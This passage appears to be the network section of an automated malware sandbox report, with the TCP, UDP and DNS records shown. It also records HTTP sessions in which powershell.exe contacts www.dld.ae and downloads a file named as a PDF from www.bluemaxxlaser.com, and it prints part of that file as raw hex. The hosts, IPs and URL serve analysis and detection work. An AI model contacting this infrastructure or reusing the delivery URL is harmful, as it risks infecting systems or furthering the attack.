                                                      Jun 1, 2023 12:14:30.897310972 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.897322893 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.897344112 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.897358894 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.897372961 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.897404909 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.897417068 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.897435904 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.897490978 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.897499084 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.897521019 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.897547960 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.897562981 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.897577047 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.897608042 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.897619009 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.897639036 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.897665977 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.897684097 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.897692919 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.897723913 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.897742033 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.897751093 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.897782087 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.897795916 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.897811890 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.897839069 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.897850990 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.897867918 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.897893906 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.897913933 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.897922993 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.897950888 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.897963047 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.897979021 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.898010969 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.898017883 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.898039103 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.898066044 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.898078918 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.898096085 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.898122072 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.898135900 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.898149014 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.898176908 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.898190022 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.898204088 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.898231030 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.898242950 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.898257971 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.898283005 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.898298979 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.898312092 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.898339033 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.898350954 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.898365021 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.898390055 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.898402929 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.898416042 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.898442030 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.898464918 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.898468018 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.898498058 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.898524046 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.898525000 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.898550987 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.898565054 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.898577929 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.898606062 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.898619890 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.898636103 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.898663998 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.898673058 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.898694992 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.898722887 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.898737907 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.898751974 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.898780107 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.898792028 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.898809910 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.898837090 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.898849010 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.898865938 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.898893118 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.898906946 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.898922920 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.898948908 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.898972034 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.898976088 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.899029970 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.899058104 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.899081945 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.899085045 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.899121046 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.899123907 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.899151087 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.899163961 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.899183035 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.899213076 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.899224997 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.899243116 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.899271965 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.899285078 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.899300098 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.899328947 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.899342060 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.899363995 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.899394989 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.899408102 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.899425983 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.899458885 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.899472952 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.899491072 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.899519920 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.899534941 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.899549007 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.899578094 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.899590015 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.899609089 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.899636984 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.899647951 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.899667978 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.899696112 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.899708033 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.899724960 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.899751902 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.899768114 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.899780989 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.899821043 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.946655989 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.946722031 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.946755886 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.946784973 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.946787119 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.946815968 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.946827888 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.946847916 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.946877003 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.946886063 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.946906090 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.946935892 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.946944952 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.946965933 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.946994066 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.947005033 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.947021961 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.947050095 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.947057962 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.947078943 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.947108030 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.947117090 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.947139025 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.947169065 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.947200060 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.947215080 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.947232008 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.947242975 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.947262049 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.947289944 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.947300911 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.947319031 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.947350025 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.947360039 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.947380066 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.947410107 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.947427988 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.947438955 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.947468996 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.947489977 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.947498083 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.947519064 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.947530985 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.947554111 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.947561026 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.947592020 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.947619915 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.947623014 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.947654009 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.947662115 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.947684050 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.947717905 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.947737932 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.947748899 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.947781086 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.947796106 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.947808981 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.947837114 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.947849035 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.947866917 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.947887897 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.947909117 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.947910070 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.947925091 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.947945118 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.947966099 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.947985888 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.948007107 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.948010921 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.948028088 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.948049068 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.948067904 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.948069096 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.948091030 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.948092937 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.948112965 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.948118925 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.948134899 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.948157072 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.948178053 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.948221922 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:31.067734003 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:31.067805052 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:31.067854881 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:31.067890882 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:31.067904949 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:31.067949057 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:31.067965031 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:31.068017960 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:31.068058014 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:31.068068981 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:31.068119049 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:31.068164110 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:31.068176985 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:31.068227053 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:31.068283081 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:31.068308115 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:31.068356037 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:31.068402052 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:31.068403959 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:31.068453074 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:31.068496943 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:31.068499088 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:31.068614960 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:31.068664074 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:31.068665028 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:31.068713903 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:31.068758965 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:31.068763971 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:31.068813086 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:31.068855047 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:31.068900108 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:31.068969011 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:31.069019079 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:31.069020033 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:31.069067955 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:31.069113970 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:31.069124937 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:31.069174051 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:31.069217920 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:31.069221020 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:31.069271088 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:31.069315910 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:31.069318056 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:31.069370031 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:31.069416046 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:31.069416046 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:31.069464922 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:31.069511890 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:31.069515944 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:31.069570065 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:31.069613934 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:31.069617987 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:31.069660902 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:31.069709063 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:31.310025930 CEST4969580192.168.2.4203.175.174.69

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Jun 1, 2023 12:14:26.847131014 CEST5968353192.168.2.48.8.8.8
                                                      Jun 1, 2023 12:14:26.875793934 CEST53596838.8.8.8192.168.2.4
                                                      Jun 1, 2023 12:14:26.880486012 CEST6416753192.168.2.48.8.8.8
                                                      Jun 1, 2023 12:14:26.895502090 CEST53641678.8.8.8192.168.2.4
                                                      Jun 1, 2023 12:14:29.324006081 CEST5856553192.168.2.48.8.8.8
                                                      Jun 1, 2023 12:14:29.344571114 CEST53585658.8.8.8192.168.2.4

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Jun 1, 2023 12:14:26.847131014 CEST192.168.2.48.8.8.80x518bStandard query (0)www.dld.aeA (IP address)IN (0x0001)false
                                                      Jun 1, 2023 12:14:26.880486012 CEST192.168.2.48.8.8.80xb09aStandard query (0)www.dld.aeA (IP address)IN (0x0001)false
                                                      Jun 1, 2023 12:14:29.324006081 CEST192.168.2.48.8.8.80xef28Standard query (0)www.bluemaxxlaser.comA (IP address)IN (0x0001)false

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Jun 1, 2023 12:14:26.875793934 CEST8.8.8.8192.168.2.40x518bNo error (0)www.dld.aedld.aeCNAME (Canonical name)IN (0x0001)false
                                                      Jun 1, 2023 12:14:26.875793934 CEST8.8.8.8192.168.2.40x518bNo error (0)dld.ae84.16.234.51A (IP address)IN (0x0001)false
                                                      Jun 1, 2023 12:14:26.895502090 CEST8.8.8.8192.168.2.40xb09aNo error (0)www.dld.aedld.aeCNAME (Canonical name)IN (0x0001)false
                                                      Jun 1, 2023 12:14:26.895502090 CEST8.8.8.8192.168.2.40xb09aNo error (0)dld.ae84.16.234.51A (IP address)IN (0x0001)false
                                                      Jun 1, 2023 12:14:29.344571114 CEST8.8.8.8192.168.2.40xef28No error (0)www.bluemaxxlaser.com203.175.174.69A (IP address)IN (0x0001)false

                                                      HTTP Request Dependency Graph

                                                      • www.dld.ae
                                                      • www.bluemaxxlaser.com

                                                      HTTP Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      0192.168.2.44969484.16.234.51443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      TimestampkBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      1192.168.2.449695203.175.174.6980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Jun 1, 2023 12:14:29.545648098 CEST350OUTGET /rh/List%20of%20required%20items%20and%20services.pdf HTTP/1.1
                                                      Host: www.bluemaxxlaser.com
                                                      Connection: Keep-Alive
                                                      Jun 1, 2023 12:14:29.714277029 CEST352INHTTP/1.1 200 OK
                                                      Date: Thu, 01 Jun 2023 10:14:29 GMT
                                                      Server: Apache
                                                      Last-Modified: Sun, 28 May 2023 21:58:29 GMT
                                                      Accept-Ranges: bytes
                                                      Content-Length: 653248
                                                      Keep-Alive: timeout=5, max=100
                                                      Connection: Keep-Alive
                                                      Content-Type: application/pdf
                                                      Data Raw: 25 50 44 46 2d 31 2e 37 0d 25 e2 e3 cf d3 0d 0a 31 32 39 20 30 20 6f 62 6a 0d 3c 3c 2f 4c 69 6e 65 61 72 69 7a 65 64 20 31 2f 4c 20 36 35 33 32 34 38 2f 4f 20 31 33 31 2f 45 20 38 36 34 32 33 2f 4e 20 35 2f 54 20 36 35 32 37 37 30 2f 48 20 5b 20 34 39 37 20 32 37 33 5d 3e 3e 0d 65 6e 64 6f 62 6a 0d 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 31 34 33 20 30 20 6f 62 6a 0d 3c 3c 2f 44 65 63 6f 64 65 50 61 72 6d 73 3c 3c 2f 43 6f 6c 75 6d 6e 73 20 35 2f 50 72 65 64 69 63 74 6f 72 20 31 32 3e 3e 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 2f 49 44 5b 3c 45 33 39 35 37 36 43 34 37 35 41 42 45 43 34 33 41 31 38 37 42 39 44 37 38 30 43 34 37 35 37 44 3e 3c 36 34 31 43 41 32 38 37 30 33 43 34 42 31 34 34 38 38 36 46 33 34 32 30 32 33 42 33 34 35 33 32 3e 5d 2f 49 6e 64 65 78 5b 31 32 39 20 33 38 5d 2f 49 6e 66 6f 20 31 32 38 20 30 20 52 2f 4c 65 6e 67 74 68 20 38 39 2f 50 72 65 76 20 36 35 32 37 37 31 2f 52 6f 6f 74 20 31 33 30 20 30 20 52 2f 53 69 7a 65 20 31 36 37 2f 54 79 70 65 2f 58 52 65 66 2f 57 5b 31 20 33 20 31 5d 3e 3e 73 74 72 65 61 6d 0d 0a 68 de 62 62 64 60 10 60 60 62 60 60 fe 04 22 19 3a 40 24 53 19 58 c4 06 44 1a 1d 05 8b 27 82 c8 6e 03 b0 6c 1b 88 64 ac 00 8b c7 02 49 46 77 66 b0 78 2d 88 d4 bb 02 24 ff 1f 34 66 60 02 9a 2c 08 56 c3 c0 38 00 e4 7f 06 c6 9c 37 40 f2 3f 3f 03 40 80 01 00 c4 3a 0e 4d 0d 0a 65 6e 64 73 74 72 65 61 6d 0d 65 6e 64 6f 62 6a 0d 73 74 61 72 74 78 72 65 66 0d 0a 30 0d 0a 25 25 45 4f 46 0d 0a 20 20 20 20 20 20 20 0d 0a 31 36 35 20 30 20 6f 62 6a 0d 3c 3c 2f 43 20 31 38 30 2f 45 20 31 36 34 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 2f 49 20 32 30 32 2f 4c 65 6e 67 74 68 20 31 36 37 2f 4f 20 31 32 36 2f 53 20 37 34 2f 56 20 31 34 32 3e 3e 73 74 72 65 61 6d 0d 0a 68 de 62 60 60 60 61 60 60 aa 64 60 65 60 48 88 67 10 62 40 00 21 06 66 a0 1c 0b 03 87 8b 03 0b 83 75 76 03 03 67 e0 d2 75 8b 0e 28 3b 